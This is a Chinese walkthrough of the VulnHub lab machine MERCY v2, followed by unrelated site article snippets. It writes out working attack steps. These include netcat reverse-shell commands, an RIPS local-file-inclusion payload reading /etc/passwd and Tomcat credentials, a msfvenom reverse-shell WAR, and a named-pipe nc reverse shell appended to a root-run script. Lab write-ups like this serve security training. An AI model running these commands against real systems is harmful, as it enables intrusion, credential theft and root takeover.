实战靶场:MERCY V2

VSole2022-01-07 16:55:00

一、知识点和漏洞

1.知识点

1)Samba文件共享服务

2)端口敲门

3)NC反弹shell

4)制作可以反弹shell的木马文件

5)Suid提权

2.漏洞

1)RIPS 0.53的本地文件包含漏洞

2)操作系统层的脏牛提权漏洞【这题里面有点鸡肋】

二、整体环境和工具



1.靶机:

官网地址:https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/

百度网盘下载地址:

链接:https://pan.baidu.com/s/1DN9K60uK-xOX-OKj8X2OKA

提取码:3lk4

靶机安装过程:

1)下载后解压文件夹


2)打开VMware15.5pro软件后


2.操作机:

kali linux 2021

链接:https://pan.baidu.com/s/1oQax7qHoenhehpMsvhp-RQ

提取 码: cj51

3.工具

(1)nmap

●工具说明和安装:存活主机判断、端口服务、操作系统等信息。

●扫描 工具为kali内置则无需安装过程。

使用说明:

a.主机发现 nmap -sP 网段/掩码

b.全面扫描 nmap -A IP地址

c.服务、端口、操作系统信息探测 nmap -sV -O IP地址

(2)dirb

工具说明:

●扫描网站后台目录

●工具为kali内置则无需安装过程

使用说明:

●扫后台 dirb 指定URL

(3)御剑

工具说明:扫描网站后台目录

使用说明:

(4)Searchsploit

工具说明:

●是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。Exploit-DB是一个漏洞库,Kali Linux中保存了一个该漏洞库的拷贝,利用上面提到的 命令就可以查找需要的渗透模块,它将搜索所有的漏洞和shellcode而且该漏洞库是保 存在本地的,在没有网络的情况下也可以使用。 工具为kali内置则无需安装过程

使用说明:基本搜索方法就是searchsploit+可能包含漏洞的软件/系统等等,对应回显存在 的漏洞和用于渗透的脚本。

(5) Metasploit——msfvenom

工具说明:

●生成木马文件。

●工具为kali内置则无需安装过程。

(6) NC工具

工具说明:nc(netcat)被誉为网络安全界的‘瑞士军刀’通过使用TCP协议或UDP协议的网络 连接去读写数据,被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,nc也是一个功能强大的网络调试和探测工具,能够建立几乎所有类型的网络连 接。

使用说明:

反向连接:

●攻击机Kali:nc -lvp 靶机端口

●目标靶机(Windows): nc 攻击者IP 攻击者端口 -e cmd.exe

●目标靶机(Linux):nc 攻击者IP 攻击者端口 -e /bin/bash

POC:

(1)RIPS 0.53的本地文件包含漏洞POC: http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd

详细可以查阅: https://www.exploit-db.com/exploits/18660

脚本程序:

敲门脚本:for x in 序列号(sequence); do nmap -Pn --max-retries 0 -p $x 目标IP; done

三、靶场演练过程

1.整体思路

1)信息收集

2)利用Samba文件共享服务

3)端口敲门

4)扫80端口后台

5)利用RIPS版本漏洞

6)获取Tomcat的webshell

7)Suid中通过timeclock文件进行提权

2.漏洞利用步骤:

步骤1:信息收集

先进行信息收集,判断存活主机【nmap -sP 192.168.240.0/24


扫描目标主机开放端口、服务、操作系统情况等【nmap -sV -O 192.168.240.132


可以看到22、80端口都处于filtered的状态

访问8080端口,尝试tomcat管理员弱密码tomcat/tomcat失败。


拿御剑扫一下后台,访问robot.txt,发现新的目录,访问该目录。

应该是一串base64加密字符串,base64解密得到:

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

中文翻译得到:

这很烦人,但我们一遍又一遍地重复:网络卫生非常重要。请停止设置会被任何像样的密码列表破解的愚蠢密码。

有一次,我们找到了密码“password”,字面意思是贴在员工办公桌前的便利贴上!尽管可能很愚蠢,但当我们威胁要解雇她时,该员工恳求宽恕。

对于那些设置不安全密码并危及企业的人,没有毛茸茸的兔子。

获取到其中有一个密码为password,但暂时没找到利用点。

再次进行信息收集【nmap -sS -A -Pn 192.168.240.132

步骤2:利用Samba文件共享服务

根据139和445端口,可见该操作系统正运行Samba服务,即文件共享。

尝试连接靶机查看共享的文件夹内容,密码尝试刚刚获取到的password即可进入查看共享文件夹内容【smbclient -L 192.168.240.132】,可以看到存在用户qiu。

直接用用户名qiu登录smb服务,密码为刚刚获取的password。

smbclient //192.168.240.132/qiu -U qiu

在/.private/opensesame目录下,获取config文件。

在获取到的config文件中,发现Port Knocking(端口敲门)序列号,主要有两组序列号,一组是用于打开HTTP服务的,另一组用于打开SSH服务的。

步骤3:端口敲门

敲击HTTP脚本文件(knock.sh)内容如下:

for x in 159 27391 4; do nmap -Pn --max-retries 0 -p $x 192.168.240.132;

done

敲击SSH脚本文件(knock1.sh)内容如下:

for x in 17301 28504 9999; do nmap -Pn --max-retries 0 -p $x 192.168.240.132; done

分别执行两个脚本文件,并通过telnet进行连接验证是否已经敲开HTTP/SSH服务。


都已经成功打开ssh、http80端口。

访问80端口,没什么有用的信息。

步骤4:80端口扫后台

通过dirb扫后台

访问/robot.txt,又获取到两个新的目录。

/mercy目录无用,但/nomercy目录下是RIPS 0.53界面。


步骤5:利用RIPS版本漏洞

searchsploit rips 0.53】搜索RIPS 0.53版本存在的漏洞,可以发现存在本地文件包含漏洞。


访问https://www.exploit-db.com/exploits/18660可以找到POC:

http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd

实验一下是否能够包含出/etc/passwd文件内容。

http://192.168.240.132/nomercy/windows/code.php?file=../../../../../../etc/passwd

根据8080端口的http服务界面的提示,管理器webapp的使用仅限于角色为“管理器-gui”的用户。主机管理器webapp仅限于角色为“admin-gui”的用户。用户在/etc/tomcat7/tomcat-users.xml中定义。


利用存在的本地包含漏洞POC对/etc/tomcat7/tomcat-users.xml包含访问

http://192.168.240.132/nomercy/windows/code.php?file=../../../../../etc/tomcat7/tomcat-users.xml】成功获取到用户的账号密码。

利用管理员的账号密码登陆tomcat管理界面。

步骤6:获取webshell

通过msfvenom来生成一个反弹war包,将shell反弹到攻击机kali的4455端口上

【msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.240.129 LPORT=4455 -f war -o shell2.war


将生成的war包上传到Tomcat站点上。

Kali通过7z命令查看war包内容【7z l shell2.war】,生成的是jsp木马为ijldxknqjmr.jsp。

Kali开启监听【nc -lvvp 4455】后访问生成的jsp木马文件来触发反弹shell。

成功获取到反弹shell,并查看当前权限,是个普通用户的权限。

步骤7:suid提权

切换到另一个fluffy用户下,密码为freakishfluffybunny。

尝试通过suid提权。

先查看有哪些是具有root权限的可写文件【find / -type f -perm 0777 2>dev/null

查看/home/fluffy/.private/secrets/timeclock文件内容。

可以看到/home/fluffy/.private/secrets/timeclock是具有root权限的,并且该脚本是在一定时间间隔后会以root权限运行并写入到/var/www/html/time中。

添加一条nc反向连接命令到脚本timeclock中,将shell反弹到攻击机kali的6677端口上

echo "rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.240.132 6677 1>/tmp/p" >> timeclock

在攻击机kali上开启端口监听,要耐心等待一会就会有shell反弹回来。可以看到目前的权限已经是root权限了,提权成功,更改root密码。


四、过程问题记录

1.上传war包时,一开始只知道上传大马文件进行连接,想通过大马上传nc工具反弹shell的,但一直上传文件失败。后来尝试通过msfvenom去生成反弹shell的木马文件进行反弹shell。

2.脏牛提权这一步,uname -a显示该靶机的版本为Linux 4.4大于脏牛提权的条件:内核版本>2.6.22。

是可以使用脏牛提权的。

在攻击机上python -m SimpleHTTPServer快速搭建一个http服务,提供一个文件浏览的web服务。将dirtycow.c上传到攻击机的/var/www/html文件夹下。靶机上在/tmp文件夹下通过wget http://192.168.240.129:8000/dirtycow.c 下载文件后,在靶机上通过gcc编译,但是靶机显示没有gcc包。后来尝试在本地编译后在上传文件,靶机下载编译好的提权文件,但一直下载不下来。查询百度以后知道,靶机是32位的,要专门用32位的脏牛提权文件,并且在kali 2018的32位版本下可以进行编译。【后续这个就没有继续尝试了】

软件网络端口
本作品采用《CC 协议》,转载必须注明作者和本文链接
随后Gartner于2019年提出安全访问服务边缘,将零信任网络访问 作为核心组件之一,进一步的让所有企业相信并拥抱零信任。基于路由模式的方案通常采用开源的TUN或TAP驱动,整体实现难度较低。Packet Filter方案实现难度相对路由模式要更高些,这也可能是初创公司没有广泛使用此方案的原因。
有效防止入侵者通过脚本上传危险程序或代码,让服务运行于安全状态。防范入侵者执行危险程序防范提权的发生。禁止危险的组件,让服务器更安全。防范因网站有注入问题导致服务器给入侵。有效的防止未经允许的扩展名脚本恶意执行,如:CER,CDX 等扩展名的木马。通过根据一组YARA规则爬行文件系统和测试文件来执行检测。根据项目计划会逐步覆盖服务器资产管理、威胁扫描、Webshell扫描查杀、基线检测等各项功能。
UDP版本将会在收到UDP包后回应含有垃圾字符的包。伪造两个chargen服务器之间的UDP包。入侵者寻找SMTP服务器是为了传递他们的SPAM。客户端向68端口广播请求配置,服务器向67端口广播回应请求。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个,这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。这将会停止缓慢的连接。
网络技术中,端口一般有两种含义: (1)硬件设备中的端口TCP/IP协议中的端口
2021年发生了多起影响工业和制造企业的网络安全事件。攻击者使用多种技术利用这些组织,包括直接或间接发起勒索软件和恶意软件攻击、破坏硬件漏洞以及瞄准其他安全漏洞。Industrialcyber访谈了知名网络安全公司的专家,就工业和制造业应对勒索攻击分享了他们的看法。
勒索软件组织LockBit于6月以LockBit 重新浮出水面,分析显示攻击的目标公司数量增加,并且加入了双重勒索功能。研究人员针对勒索软件LockBit 发出警告,指出自该勒索软件推出不久,全球各地已有超过50个组织受害,受害者遍及多种产业。LockBit 还滥用Process Hacker和PC Hunter等合法工具来终止受害系统中的进程和服务。LockBit 背后的组织最近进行了一次高度公开的攻击,因此组织需要对这种勒索软件变体保持警惕。保护和恢复 执行数据保护、备份和恢复措施。
管理员角色对于保护网络免受攻击至关重要,需要配备专门人员来保护网络上的设备、应用程序和信息。应在网络边界实施多层防御,以抵御外部威胁,监控和限制出入流量。在整个网络中部署多层下一代防火墙,限制出入流量,检查网络区域之间的所有内部活动。NAC方案可防止未授权物理连接,监控网络上已授权的物理连接。为防护这些漏洞,管理员应禁用所有不必要的功能,并对流向VPN网关的流量采用严格的流量过滤规则。
文章速览:为什么要使用便携式网络取证工具?构建便携式网络取证套件法证分析ProfiShark 1G作为便携式分路器的优点 网络安全领域日益重视便携式取证工具的灵活应用。本文介绍了如何构建一个以ProfiShark 1G为核心的便携式网络取证工具包,以提高网络取证的效率和实效性。 一、为什么要使用便携式网络取证工具?1、企业自身需求网络取证和网络安全团队需要具备拦截网络流量和实时
近日,美国多家机构包括FBI、NSA、CISA和EPA联合发布网络安全咨询报告,数据显示,内部威胁和勒索软件是当前企业组织面临的主要威胁,而水处理等关键基础设施领域正成为勒索软件重点攻击的目标。报告重点披露了三起由勒索软件引起的美国水和废水处理设施 (WWS) 攻击事件,在所有攻击中,勒索软件都对受感染系统文件进行了加密,在其中一起安全事件中,攻击者破坏了用于控制监控和数据采集(SCADA)工业设
芬兰一家主要的IT供应商遭受了勒索软件攻击,该勒索软件攻击迫使该公司在采取恢复措施的同时中断了对客户的某些服务和基础架构的破坏。报告称,Remman承认TietoEVRY为25个客户提供的几种服务存在技术问题,这些服务“是由于勒索攻击”。雷姆曼告诉E24,该公司认为这次袭击是“严重的犯罪行为”。该报告称,该公司已将事件告知客户,并随着情况的发展与他们保持持续沟通。目前尚不清楚哪个勒索软件组负责攻击。
VSole
网络安全专家